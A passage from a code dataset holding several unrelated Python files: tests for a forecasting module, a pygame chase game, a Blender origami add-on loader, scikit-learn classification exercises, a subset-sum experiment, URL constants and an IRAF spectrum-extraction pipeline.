main()\n","sub_path":"tranny/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60665560","text":"from datetime import datetime\n\nfrom pandas._testing import assert_frame_equal\n\nfrom forecast.cross_validate import (\n cross_validate,\n build_design_matrix,\n evaluate_features,\n)\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\n\n\ndef test_build_design_matrix(test_input_df, test_design_df):\n actual_design_df = build_design_matrix(\n test_input_df,\n date_col=\"date\",\n var_col=\"GDP\",\n horizon=1,\n start_date=\"2019-12-01\",\n end_date=\"2020-11-01\",\n )\n assert_frame_equal(actual_design_df, test_design_df)\n\n\ndef test_cross_validate(test_design_df, test_result_df):\n lr = LinearRegression()\n actual_result = cross_validate(\n test_design_df,\n date_col=\"date\",\n feature_cols=[\"feature\", \"GDP_lag\"],\n target_col=\"GDP_forecast\",\n estimator=lr,\n window=3,\n period=1,\n horizon=1,\n )\n assert_frame_equal(actual_result, test_result_df)\n\n\ndef test_evaluate_features(test_input_df, test_design_df, test_result_df):\n lr = LinearRegression()\n actual_design, actual_result = evaluate_features(\n test_input_df,\n date_col=\"date\",\n var_col=\"GDP\",\n horizon=1,\n estimator=lr,\n window=3,\n period=1,\n return_model=False,\n start_date=\"2019-12-01\",\n end_date=\"2020-11-01\",\n )\n assert_frame_equal(actual_result, test_result_df)\n assert_frame_equal(actual_design, test_design_df)\n","sub_path":"tests/test_cross_validate.py","file_name":"test_cross_validate.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459322122","text":"#importing pygame and initializing game as well\nimport pygame\npygame.init()\n#importing time, random and math function\nimport time \nimport random\nimport math\n#setting the size of the window, setting the caption and starting the \"time\" start on the game\nscreen = pygame.display.set_mode((500, 500))\npygame.display.set_caption('CATCH CHARLIE, ASAP!!!')\nclock = pygame.time.Clock()\n\n#uploading all my images\nbackground_image = pygame.image.load('images/neighstreet.jpg').convert_alpha()\nAli_image = pygame.image.load('images/ali.png').convert_alpha()\ncharlie_image = pygame.image.load('images/charlie.png').convert_alpha()\ncar_image = pygame.image.load('images/redcar.png'). convert_alpha()\n#reconstructing my background image\nbackground_image = pygame.image.load('images/neighstreet.jpg')\nbackground_image = pygame.transform.scale(background_image, (500, 500))\n#reconstructing ali image\nAli_image = pygame.image.load('images/ali.png')\nAli_image = pygame.transform.scale(Ali_image, (68, 185))\n#reconstructing charlie image\ncharlie_image = pygame.image.load('images/charlie.png')\ncharlie_image = pygame.transform.scale(charlie_image, (70, 120))\n#reconstructing car image\ncar_image = pygame.image.load('images/redcar.png')\ncar_image = pygame.transform.scale(car_image, (70, 120))\n\n###if player wins, a func that will called later, play this horrible music :(\nplayer_wins = pygame.mixer.Sound ('sounds/win.wav')\n###loading it to my code\npygame.mixer.music.load('sounds/music.wav')\n#unfortuntely play this music\n##well you lost so (variable will be used later on)...\nlose_sound = pygame.mixer.Sound ('sounds/lose.wav')\npygame.mixer.music.play()\n\nclass Ali:\n def __init__ (self, width, height):\n self.timer = 0\n self.direction = 2\n self.x = width/2\n self.y = height/2\n self.caught = False\n def change_direction(self, width, height, xlane, ylane):\n #this took a tremendous amount of playing with since i have funny sizes for my images\n #if Ali's width + 125 pixels is greater than the width of the gaming window,\n #then width is equal to width minus -125. thus essentially never letting it be equal to\n #anything greater than the 500/500 window. \n if self.x + 125 > width:\n self.x = width - 125\n #else/if the Ali's width is less than 0 on the x-axis then it equals to zero, meaning\n #hero cannot go beyond the 0 point on the x axis\n elif self.x < 0:\n self.x = 0\n #if Ali's height is less than 0 on the y-axis then continue to keep it equal to zero, aka\n #the hero cannot go beyond the 0 point on the y axis\n if self.y < 0:\n self.y = 0\n #else/if Ali's height + 200 is greater than the height of the window, then\n #ensure her new position never exceeds the furthest point on the y axis\n elif self.y + 200 > height:\n self.y = height - 200\n #giving ability to move in all direction, this will be keyed in later\n ###if on the yaxis and going up, then on the xaxis add some opposite direction,\n if ylane == 0:\n self.y = self.y - self.direction\n ###if on the yaxis and going down, then on the xaxis add some opposite direction\n elif ylane == 1:\n self.y = self.y + self.direction\n ####if on the xaxis and going up, then on the yaxis and some opposite direction\n if xlane == 0:\n self.x = self.x + self.direction\n ####if on the xaxis and going down, then on the yaxis add some direction(opposite)\n elif xlane == 1:\n self.x = self.x - self.direction\nclass Protagonist:\n def __init__ (self, width, height):\n self.xlane = random.randint(0, 1)\n self.ylane = random.randint(0, 1)\n self.timer = 2\n self.direction = 3\n self.x = width\n self.y = height\n self.caught = False\n\n def change_direction(self, width, height):\n #*****CHARLIE/PROTAG MOVES RIGHT****** \n self.x += -2\n if self.x < 0:\n self.x = 500\n #*****CHARLIE/PROTAG MOVES LEFT*******\n self.x += 2\n if self.x > 500:\n self.x = 0\n #*****CHARLIE/PROTAG MOVES UP********\n self.y += -2\n if self.y < 0:\n self.y = 500\n #******CHARLIE/PROTAG MOVES DOWN******\n self.y += 2\n if self.y > 500:\n self.y = 0\n #********activates the movement#######\n ####if on the xaxis and going up, then on the yaxis and some opposite direction\n if self.xlane == 0:\n self.y = self.y + self.direction \n ####if on the xaxis and going down, then on the yaxis add some direction(opposite)\n elif self.xlane == 1:\n self.y = self.y - self.direction\n ###if on the yaxis and going up, then on the xaxis add some opposite direction\n if self.ylane == 0:\n self.x = self.x - self.direction\n ###if on the yaxis and going down, then on the xaxis add some opposite direction\n elif self.ylane == 1:\n self.x = self.x + self.direction\n \n\nclass Charlie(Protagonist):\n pass\nclass Cars(Protagonist):\n pass\n\ndef main():\n ###Could have set it to classic 500,500 but i felt like my background image really needed more space\n width = 550\n height = 550\n\n ###instead of calling my classes I can use this instead. creating them as variables.\n charlie = Protagonist(width, height)\n player = Ali(width, height)\n car1 = Protagonist(width, height)\n car2 = Protagonist(width, height)\n car3 = Protagonist(width, height)\n ###setting the font, and asking if they want to chase the pup again in white\n f = pygame.font.Font(None, 30)\n surf = f.render(\"Drop the leash?PRESS RETURN\", 10, (255, 255, 255))\n surf_losegame = f.render(\"Try again? PRESS RETURN.\", 1, (255,255,255))\n \n\n\n ####Game logic, while stop_game is equal to false......\n stop_game = False\n ##while the game has not stopped\n while not stop_game:\n ##calling the function from earlier, to change direction, i also edited\n ###the images at the top of the code to set their visual height in the game\n charlie.change_direction(width, height)\n car1.change_direction(width, height)\n car2.change_direction(width, height)\n car3.change_direction(width, height)\n ###must run this for events, (aka, anytime user pushes anything)\n for event in pygame.event.get():\n ###the game will only quit once stop_game is equal to true (with closing the tab)\n if event.type == pygame.QUIT:\n stop_game = True\n #basically just establishing a starting position \n xlane = 4\n ylane = 4\n #if right key gets pressed move in the 0 direction aka xaxis\n key = pygame.key.get_pressed()\n if key [pygame.K_RIGHT]: \n xlane = 0\n #if the left key gets pressed mmove in the 1 directoin aka xaxis\n if key [pygame.K_LEFT]:\n xlane = 1\n #if the up key gets pressed move it up on the yaxis\n if key [pygame.K_UP]:\n ylane = 0\n #if the down key get's pressed move it down on the yaxis\n if key [pygame.K_DOWN]:\n ylane = 1\n ###using this incredible formula to calcuate distance on step 14\n ###given that an image is 32 pixels, mine are not and I had to play with this\n ###i made the formula relevent to 50 pixels because i was using large photos\n if math.sqrt((player.x - charlie.x)**2 + (player.y - charlie.y)**2) <= 60:\n charlie.caught = True \n player_wins.play()\n if math.sqrt((player.x - car1.x)**2 + (player.y - car1.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n if math.sqrt((player.x - car2.x)**2 + (player.y - car2.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n if math.sqrt((player.x - car3.x)**2 + (player.y - car3.y)**2) <= 90:\n player.caught = True\n lose_sound.play()\n\n ###if key return gets pressed, (after charlie get's caught of course )\n if key [pygame.K_RETURN] and charlie.caught:\n charlie.caught = False #now it would reset that charlie is not caught.......\n ####and send charlie back to random-ville\n charlie.x = random.randint(0, width)\n charlie.y = random.randint(0, height)\n if key [pygame.K_RETURN] and player.caught or car1.caught or car2.caught or car3.caught:\n player.caught = False\n #charlie.caught = False\n charlie.x = random.randint(0, width)\n charlie.y = random.randint(0, height)\n \n ###justing calling the function for the player, aka ali, get to steppin' \n player.change_direction(width, height, xlane, ylane)\n #####drawing the background, setting the backround image\n screen.blit(background_image, [0, 0])\n if not player.caught:\n screen.blit(Ali_image, [player.x, player.y])\n if player.caught:\n screen.blit(surf_losegame, [width/7, height/2])\n ###drawing ali in to the mix, i belive the rest is confirming the x and y axis of the images\n #screen.blit(Ali_image, [player.x, player.y])\n screen.blit(car_image, [car1.x, car1.y])\n screen.blit(car_image, [car2.x, car2.y])\n screen.blit(car_image, [car3.x, car3.y])\n ##if charlie is not caught, let that boy run to his hearts content\n if not charlie.caught:\n screen.blit(charlie_image, [charlie.x, charlie.y])\n ###if charlie is caught, boof charlie is gone for a second\n if charlie.caught:\n screen.blit(surf, [width/5, height/2])\n\n # Gaming display\n pygame.display.update()\n charlie.timer += clock.tick(60)\n #I know the instructions called for 2 seconds(2000), but i want it to be hard to get charlie like it was in real life.\n if charlie.timer >= 500:\n charlie.timer = 0\n ###for all of the coordinates used by the protagonists, make sure they are random, range set for 0-3\n charlie.xlane = random.randint(0, 3)\n charlie.ylane = random.randint(0, 3)\n car3.xlane = random.randint(0, 3)\n car3.ylane = random.randint(0, 3)\n car2.xlane = random.randint(0, 3)\n car2.ylane = random.randint(0, 3)\n car3.xlane = random.randint(0, 3)\n car3.ylane = random.randint(0, 3)\n\n\n\n\n\n pygame.quit()\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"testingpygame.py","file_name":"testingpygame.py","file_ext":"py","file_size_in_byte":10740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647675853","text":"'''\nBEGIN GPL LICENSE BLOCK\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software Foundation,\nInc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\nEND GPL LICENCE BLOCK\n'''\n\nbl_info = {\n \"name\": \"doshape Mesh tools\",\n \"author\": \"yhoyo (Diego Quevedo\",\n \"version\": (1, 0, 1),\n \"blender\": (2, 7, 3),\n \"category\": \"Mesh\",\n \"location\": \"View3D > EditMode > ToolShelf\",\n \"wiki_url\": \"\",\n \"tracker_url\": \"\"\n}\n\n\nif \"bpy\" in locals():\n import imp\n\nimport bpy\nfrom mesh_doshape_tools.CoDEmanX_pivote import VIEW3D_OT_pivot_point_set, VIEW3D_MT_pivot_point_set\nfrom mesh_doshape_tools.origami_symbols import OBJECT_OT_add_object\nfrom mesh_doshape_tools.OrigamiPanel import opendoshapeurloperator, opendoshapeurlPanel, SeleccionarPanel, ObjetosPanel, FuncionesPanel, DoblarPanel, DoblarbPanel, MundoPanel, MarcasPanel, LineasPanel, RenderPanel, ParamodificarPanel #MaterialPanel, MaterialesPanel,\nfrom mesh_doshape_tools.lines_origami_freestyle import MontanaOperator,delMontanaOperator, delCreaseOperator, CreaseOperator\n\nfrom mesh_doshape_tools.separar_unir_caras import SeparaConectaOperator, SeparaConectaOperatorPanel\nfrom mesh_doshape_tools.join_explote import JoinExploteOperator, JoinExploteOperatorPanel\nfrom mesh_doshape_tools.mover import MoverVerticesOperator, MoverVerticesOperatorPanel\n\nfrom mesh_doshape_tools.HideShow import HideShowOperator, HideShowOperatorPanel\nfrom mesh_doshape_tools.NirenYang_mesh_edges_length_angle_yi import LengthSet, AngleSet\nfrom mesh_doshape_tools.equal_angles import angleBisectorOperator,angleBisectorOperatorPanel\n#from mesh_doshape_tools.degree_angle_bisector import DegreeBisectorOperator, DegreeBisectorOperatorPanel\nfrom mesh_doshape_tools.perpendicular_bisector import PerpendicularBisectorOperator, PerpendicularBisectorOperatorPanel\nfrom mesh_doshape_tools.perpendicular_orthocenter import PerpendicularOrthoOperator, PerpendicularOrthoOperatorPanel\nfrom mesh_doshape_tools.perpendicular_circum_center import PerpendicularCircumOperator, PerpendicularCircumOperatorPanel\nfrom mesh_doshape_tools.join_bisector import JoinBisectorOperator, JoinBisectorOperatorPanel\nfrom mesh_doshape_tools.triangle_bisector import TriangleBisectorOperator, TriangleBisectorOperatorPanel\nfrom mesh_doshape_tools.edge_length_equalizer import Edge_Equalizer_LengthOperator, Edge_Equalizer_LengthOperatorPanel\n\nfrom mesh_doshape_tools.render_save_all import Render_Save_ScenesOperator, Render_Save_ScenesOperatorPanel\n\n\ndoshape_classes = (\n\t[VIEW3D_OT_pivot_point_set, \"Operador pivote\"],\n\t[VIEW3D_MT_pivot_point_set, \"menu pivote\"],\n\t[opendoshapeurloperator, \"Operador url\"],\n\t[OBJECT_OT_add_object, \"add origami symbol\"],\n\t\n\t[opendoshapeurlPanel, \"Menu url\"],\n\t[SeleccionarPanel, \"test\"],\n\t[ObjetosPanel, \"test\"],\n\t[FuncionesPanel, \"test\"],\n\t[DoblarPanel, \"test\"],\n\t[DoblarbPanel, \"test\"],\n\t[MundoPanel, \"test\"],\n\t[MarcasPanel, \"test\"],\n\t[LineasPanel, \"test\"],\n\t[RenderPanel, \"test\"],\n\t\n\t[Render_Save_ScenesOperator, \"test\"],\n\t[Render_Save_ScenesOperatorPanel, \"test\"],\n\t\n\t#[MaterialPanel, \"test\"],\n\t#[MaterialesPanel, \"test\"],\n\t[ParamodificarPanel, \"test\"],\n\t\n\t[SeparaConectaOperator, \"separa caras operador\"],\n\t[SeparaConectaOperatorPanel, \"panel separar caras\"],\n\t\n\t[MoverVerticesOperator, \"mueve vertices operador\"],\n\t[MoverVerticesOperatorPanel, \"panel de mover vertices\"],\n\t\n\t[JoinExploteOperator, \"explota caras operador\"],\n\t[JoinExploteOperatorPanel, \"Une separa caras\"],\n\t\n\t[LengthSet, \"largo borde\"],\n\t[AngleSet, \"angulo borde\"],\n\t[MontanaOperator, \"linea montaña\"],\n\t[delMontanaOperator, \"borrar montaña\"],\n\t[delCreaseOperator, \"linea crease\"],\n\t[CreaseOperator, \"borrar linea crease\"],\n\n\t[HideShowOperator, \"ocultar mostrar inverso operador\"],\n\t[HideShowOperatorPanel, \"ocultar mostrar inverso panel\"],\n\t\n [angleBisectorOperator, \"divide angulo en partes iguales\"],\n\t[angleBisectorOperatorPanel, \"dibuja panel para equally_angle\"],\n#\t[DegreeBisectorOperator, \"divide la malla en un angulo indicado\"],\n#\t[DegreeBisectorOperatorPanel, \"dibuja panel para DegreeBisectorOperator\"],\n\t[PerpendicularBisectorOperator, \"divide la malla en un angulos de 90 desde los vertices\"],\n\t[PerpendicularBisectorOperatorPanel, \"divide la malla en un angulo indicado\"],\n\t[PerpendicularOrthoOperator, \"Dibuja las lineas a 90 grados para formar Orthocentros\"],\n\t[PerpendicularOrthoOperatorPanel, \"Dibuje el panel de Ortocentro\"],\n\t[PerpendicularCircumOperator, \"Dibuja las lineas a 90 grados para formar circumcentros\"],\n\t[PerpendicularCircumOperatorPanel, \"Dibuja el panel de Circumcentro\"],\n\t[JoinBisectorOperator, \"Une dos vertices y divide la malla\"],\n\t[JoinBisectorOperatorPanel, \"Del panel de Join\"],\n\t[TriangleBisectorOperator, \"Triangle bisector\"],\n\t[TriangleBisectorOperatorPanel, \"Dibuja el panel del trianglebisector\"],\n\t[Edge_Equalizer_LengthOperator, \"edge equalizer operator\"],\n\t[Edge_Equalizer_LengthOperatorPanel, \"Edge Equalizer panel\"]\n\n)\n\n\ndef menu_func(self, context):\n for i, text in doshape_classes:\n self.layout.operator(i.bl_idname, text=text)\n\ndef register():\n \n\ttry:\n\t\tfor i, _ in doshape_classes:\n \n\t\t\ttry:\n\t\t\t\tbpy.utils.register_class(i)\n\t\t\texcept:\n\t\t\t\tprint(\"error al registrar: \" + str(i))\n\texcept:\n\t\tprint(\"imposible registrar modulos\")\n\ndef unregister():\n \n\ttry:\n\t\tfor i, _ in doshape_classes:\n \n\t\t\ttry:\n\t\t\t\tbpy.utils.unregister_class(i)\n\t\t\texcept:\n\t\t\t\tprint(\"error al desregistrar: \" + str(i))\n\texcept:\n\t\tprint(\"imposible esregistrar modulos\")\n \nif __name__ == \"__main__\":\n\tregister()\n\t\n","sub_path":"scripts/addons_extern/mesh_doshape_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455029780","text":"#Fitting multi-class logistic regression#\r\n\r\n#In this exercise, you'll fit the two types of multi-class logistic regression, one-vs-rest and softmax/multinomial, on the handwritten digits data set and compare the results. The handwritten digits dataset is already loaded and split into X_train, y_train, X_test, and y_test.\r\n\r\n# Fit one-vs-rest logistic regression classifier\r\nlr_ovr = LogisticRegression()\r\nlr_ovr.fit(X_train, y_train)\r\n\r\nprint(\"OVR training accuracy:\", lr_ovr.score(X_train, y_train))\r\nprint(\"OVR test accuracy :\", lr_ovr.score(X_test, y_test))\r\n\r\n# Fit softmax classifier\r\nlr_mn = LogisticRegression(multi_class=\"multinomial\", solver=\"lbfgs\")\r\nlr_mn.fit(X_train, y_train)\r\n\r\nprint(\"Softmax training accuracy:\", lr_mn.score(X_train, y_train))\r\nprint(\"Softmax test accuracy :\", lr_mn.score(X_test, y_test))\r\n\r\n\r\n#Fitting multi-class logistic regression\r\n\r\n#In this exercise, you'll fit the two types of multi-class logistic regression, one-vs-rest and softmax/multinomial, on the handwritten digits data set and compare the results. The handwritten digits dataset is already loaded and split into X_train, y_train, X_test, and y_test.\r\n\r\n# Print training accuracies\r\nprint(\"Softmax training accuracy:\", lr_mn.score(X_train, y_train))\r\nprint(\"One-vs-rest training accuracy:\", lr_ovr.score(X_train, y_train))\r\n\r\n# Create the binary classifier (class 1 vs. rest)\r\nlr_class_1 = LogisticRegression(C = 100)\r\nlr_class_1.fit(X_train, y_train==1)\r\n\r\n# Plot the binary classifier (class 1 vs. rest)\r\nplot_classifier(X_train, y_train==1, lr_class_1)\r\n\r\n\r\n\r\n#One-vs-rest SVM#\r\n\r\n#As motivation for the next and final chapter on support vector machines, we'll repeat the previous exercise with a non-linear SVM. Once again, the data is loaded into X_train, y_train, X_test, and y_test .#\r\n\r\n#Instead of using LinearSVC, we'll now use scikit-learn's SVC object, which is a non-linear \"kernel\" SVM (much more on what this means in Chapter 4!). Again, your task is to create a plot of the binary classifier for class 1 vs. rest.\r\n\r\n# We'll use SVC instead of LinearSVC from now on\r\nfrom sklearn.svm import SVC\r\n\r\n# Create/plot the binary classifier (class 1 vs. rest)\r\nsvm_class_1 = SVC()\r\nsvm_class_1.fit(X_train, y_train==1)\r\nplot_classifier(X_train, y_train==1,clf = svm_class_1)","sub_path":"python_career_machine_learning_scientist/03_linear_classifiers_in_python/Logistic_regression/03_multiclass_regression.py","file_name":"03_multiclass_regression.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460636809","text":"from random import randint, sample\r\nfrom itertools import chain, combinations\r\nimport time\r\nimport sys\r\n\r\nclass SSP():\r\n def __init__(self, S=[27,2,16,14], t=30, worst=0, best=100):\r\n self.S = S\r\n self.t = t\r\n self.n = len(S)\r\n self.best = best\r\n self.worst = worst\r\n self.TotalTime = 0\r\n self.myMax = []\r\n #\r\n self.decision = False\r\n self.total = 0\r\n self.selected = []\r\n\r\n def __repr__(self):\r\n return \"SSP instance: S=\"+str(self.S)+\"\\tt=\"+str(self.t)\r\n \r\n def random_instance(self, n, bitlength=10):\r\n max_n_bit_number = 2**bitlength-1\r\n self.S = sorted( [ randint(0,max_n_bit_number) for i in range(n) ] , reverse=True)\r\n self.t = randint(0,n*max_n_bit_number)\r\n self.n = len( self.S )\r\n\r\n def random_yes_instance(self, n, bitlength):\r\n max_n_bit_number = 2**bitlength-1\r\n self.S = sorted( [ randint(0,max_n_bit_number) for i in range(n) ] , reverse=True)\r\n self.t = sum( sample(self.S, randint(0,n)) )\r\n self.n = len( self.S )\r\n\r\n ###\r\n\r\n def try_at_random(self):\r\n candidate = []\r\n total = 0\r\n startTime = time.time()\r\n while total != self.t:\r\n candidate = sample(self.S, randint(0,self.n))\r\n total = sum(candidate)\r\n ## print( \"Trying: \", candidate, \", sum:\", total )\r\n endTime = time.time()\r\n TimeTaken = endTime - startTime\r\n print(TimeTaken)\r\n\r\n\r\n def resetvars(self):\r\n self.best = sys.maxsize\r\n self.worst = 0.0\r\n self.TotalTime = 0.0\r\n self.myMax = []\r\n\r\n def exhaustive_search(self):\r\n \r\n # t0 = time.clock()\r\n StartTime = time.time()\r\n for subset in chain.from_iterable(combinations(self.S, r) for r in range(len(self.S)+1)):\r\n ##print (\"Subset didnt match \",subset)\r\n \r\n if sum(subset)==self.t:\r\n ##print(\"\", end ='')\r\n EndTime = time.time()\r\n TimeTaken = EndTime - StartTime\r\n ##print(TimeTaken,self.t,subset)\r\n self.TotalTime += TimeTaken\r\n\r\n if self.worst < TimeTaken:\r\n self.worst = TimeTaken\r\n \r\n if self.best > TimeTaken:\r\n self.best = TimeTaken\r\n ##print(subset,self.t,self.best)\r\n return self.best,self.worst,self.TotalTime\r\n ##print(\"Subset did match \", subset)\r\n # print(time.clock() - t0, \"seconds\")\r\n \r\n def Dynamic_Programming(self):\r\n StartTime = time.time()\r\n subset = [[ False for x in range(self.n+1)] for y in range(self.t+1)] \r\n i = 0\r\n for i in range(self.n):\r\n \r\n subset[0][i] = True\r\n ##print(i,subset[0][i])\r\n \r\n for i in range(1,self.t):\r\n \r\n subset[i][0] = False\r\n\r\n\r\n for i in range(1,self.t+1):\r\n \r\n for j in range(1,self.n+1):\r\n \r\n subset[i][j] = subset[i][j-1]\r\n \r\n if (i >= self.S[j-1]):\r\n ##print(\"before\",subset[i+1][j+1])\r\n subset[i][j] = subset[i][j] or subset[i-self.S[j-1]][j-1]\r\n ##print(\"after\",subset[i+1][j+1])\r\n \r\n \r\n## for i in range(self.t+1):\r\n## j=0\r\n## print (\"reulting grid1\",i,j,subset[i][j])\r\n## \r\n## \r\n## for j in range(self.n+1):\r\n## \r\n## print (\"reulting grid2\",i,j,subset[i][j])\r\n \r\n ##print(self.t,self.n,subset[self.t][self.n])\r\n ##return subset[self.t][self.n]\r\n EndTime = time.time()\r\n TimeTaken = EndTime - StartTime\r\n ##print(TimeTaken,self.t,subset)\r\n self.TotalTime += TimeTaken\r\n return self.best,self.worst,self.TotalTime\r\n\r\n def HighestNumber(self,total):\r\n maxSoFar = 0\r\n \r\n for num in self.S:\r\n if maxSoFar < num and (num + total) <= self.t and num not in self.myMax:\r\n maxSoFar = num\r\n if maxSoFar != 0:\r\n self.myMax.extend([maxSoFar])\r\n print(\"This is myMax\",self.myMax)\r\n \r\n \r\n def Greedy(self):\r\n i = 0\r\n total = 0\r\n subset = []\r\n while [x for x in self.S if x not in subset]:\r\n if i == 0:\r\n instance.HighestNumber(total)\r\n \r\n print(self.S[i],total)\r\n if (total +self.S[i] <= self.t and self.S[i] in self.myMax):\r\n subset.extend([self.S[i]])\r\n total += self.S[i]\r\n i = -1\r\n i+=1\r\n print(subset, \" \" ,i)\r\n if self.n <= i:\r\n self.myMax = []\r\n print(\"Found the solution and it is \", (self.t - total))\r\n return subset, self.t - total\r\n def f(self,s):\r\n return self.t - sum(s)\r\n\r\n def Iterative_Improvement(self, s):\r\n i=0\r\n s2 = [ s[x] for x in range(len(s))]\r\n print(len(s2))\r\n print(\"This is s2 \", s2, \"This is s \",s)\r\n while sum(s) != self.t or i != self.S:\r\n for num in self.S:\r\n print(num,\" \", s)\r\n if num not in s:\r\n print (len(s2),i)\r\n if len(s2) <= i:\r\n return \"most optimum solution possible for this search\",s,\" \",s2\r\n s2[i] = num\r\n i+=1\r\n \r\n print(instance.f(s2),\" \",instance.f(s))\r\n if instance.f(s2) < instance.f(s) and instance.f(s2) >= 0:\r\n print(\"Found a better solution\")\r\n s = s2\r\n print(\"Solution \",s)\r\n #replace s with better solution\r\n #return s\r\ncount = 0 \r\nq = 0 \r\n \r\n\r\ninstance = SSP()\r\ntime.clock()\r\nbest_candidate,result = instance.Greedy()\r\nprint(instance.Iterative_Improvement(best_candidate))\r\nfor n in range(25,40): # start the search with 5 elements in array, stop when there are 29 elements\r\n instance.resetvars()\r\n q += 1\r\n \r\n# start the clock\r\n for i in range(40): # After 5 iterations the loop ends. Loop starts again when new element is added to the array.\r\n pass\r\n ##instance.random_yes_instance(n,10)\r\n ##result = instance.Greedy()\r\n ##print( instance )\r\n \r\n ##bestcase, worstcase , TotalTime = instance.exhaustive_search()\r\n ##instance.Dynamic_Programming()\r\n ##instance.try_at_random()\r\n ##bestcase, worstcase, TotalTime = instance.Dynamic_Programming()\r\n ##if n == 30:\r\n ##print(\"Stop now\",time.clock())\r\n \r\n ##print(time.clock(), \"seconds LAST\") # I was testing here, I think this prints the total time it took for all 5 searches \r\n\r\n ##print((TotalTime/40)*10) # Because the search is run amongst arrays of the same size 5 times, before incrementing the array size by 1, the avg would be the total clock time divided by 5. (Again just testing here)\r\n ##print(worstcase*10)\r\n ##print(bestcase*10)\r\n##print(best_candidate)\r\n","sub_path":"SSP Problem version 4.py","file_name":"SSP Problem version 4.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"51910250","text":"# System URLs\nrequestWarmUp = '/_ah/warmup'\n\nrequestTest = '/test'\nrequestUserSignUpTrack = '/track'\nrequestGetParcelStatus = '/get-parcel-status'\nrequestTwitterCallback = '/twitter/oauth-callback'\n\ntwitterSendMessage = '/twitter/send-message'\n\nfirebaseNotification = '/firebase/notification'\n\ncronCheckParcelStatuses = '/work/check-parcel-statuses'\ntaskGetParcelStatus = '/work/get-parcel-status'\ntaskNotificationSMS = '/work/notification-sms'\ntaskNotificationIFTTTEmail = '/work/notification-ifttt'\n\n# Admin\nadminSendUpdate = '/send/update'","sub_path":"controllers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622046898","text":"#### Manual extraction pipeline. Extracts arc, identifies lines, extracts spectrum for multiple file and wavelength calibrates. \n#### Flux calibrates to sensitivity function, then corrects to spectrostandard. \n#### Automatically removes previous extraction files when extract_spectra = 'y'\n\nfrom pyraf import iraf\nimport os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\n\n############################\nz = 0.0\nextract_arc = 'y'\nextract_spectra = 'y'\nflux_calibrate = 'y'\napply_flux_correction = 'y'\nplotgal = 'y'\nplotvel = 'n'\nvelocity = 15500\nE = 1e-5\n############################\n\n####### Define function\ndef dop(lamr,vel):\n vel=vel*-1\n a = (1.+vel/3.e5)**0.5\n b=(1.-vel/3.e5)**0.5\n return lamr*a/b\n\ndef dered(wav,flux,Rv,Ebv):\n lam=wav*0.0001\n Av=Ebv*Rv\n x=1/lam\n y=x-1.82\n a=1+(0.17699*y)-(0.50477*y**2)-(0.02427*y**3)+(0.72085*y**4)+(0.01979*y**5)-(0.77530*y**6)+(0.32999*y**7)\n b=(1.41338*y)+(2.28305*y**2)+(1.07233*y**3)-(5.38434*y**4)-(0.62251*y**5)+(5.30260*y**6)-(2.09002*y**7)\n AlAv=a+b/Rv\n Al=AlAv*Av\n #print Al\n F=10**(Al/2.5)\n delF= flux*F\n return delF\n \ndef isarc(fits_file):\n hdul = fits.open(fits_file)\n hdr = hdul[0].header\n if 'OBSTYPE' in hdr:\n if hdr['OBSTYPE']=='ARC':\n return True\n else:\n return False \ndef name(fits_file):\n hdul = fits.open(fits_file)\n hdr = hdul[0].header\n if 'OBJECT' in hdr:\n return hdr['OBJECT']\n \n else:\n print ('No defined object name in fits header -- please provide an object name\\n') \n return raw_input('Object name: ')\n \n### misc definitions\nspectrafilelist='@speclist'\nsensfile='newsen'\nhthresh2=90000\n\n\n### make a list of the files\n## create the speclist but importing all fits files in folder but rejecting the sensfunc file, arc, and previous extraction files\nfile_list = glob.glob('./*.fits');file_list.sort()\n\n\n### find arcfile\nfor f in file_list:\n if isarc(f) == True:\n arcfile = f\n \n### find object file \nfinal=[]\nfor j in range(len(file_list)):\n if sensfile not in file_list[j]:\n if arcfile not in file_list[j]:\n if '.ms.fits' not in file_list[j]:\n if '.w.fits' not in file_list[j]: \n final.append(file_list[j])\n \n### Define the object name\nobj = name(final[0])\n \n \n### Save the list of spectra \nnp.savetxt('./speclist',final,fmt=\"%s\")\n\n### apall on arc\niraf.twodspec()\niraf.apextract(dispaxis=1)\n\nif extract_arc !='n':\n print('\\n'+'Extracting arc file')\n iraf.apall(input=arcfile, output='arc.ms',apertur=1,interac='yes',find='yes',nfind=1,recente='yes',resize='yes',background='none')\n\n ## identify lines\n print('\\n'+'Identify arc lines')\n iraf.identify(images='arc.ms',coordlist='Xe.txt', function='spline3',order=3,maxfeatures=10)\n\nif extract_spectra !='n':\n \n ### apall on spectrum\n for n in final:\n \n ### Remove previous extractions\n if os.path.exists(n+'.ms.fits')==True:\n print('Removing',n+'.ms.fits')\n os.remove(n+'.ms.fits')\n if os.path.exists(n+'.w.fits')==True:\n print('Removing',n+'.w.fits')\n os.remove(n+'.w.fits')\n \n ### Commence extraction\n print('\\n'+'Spectrum file = '+n+'[0]')\n 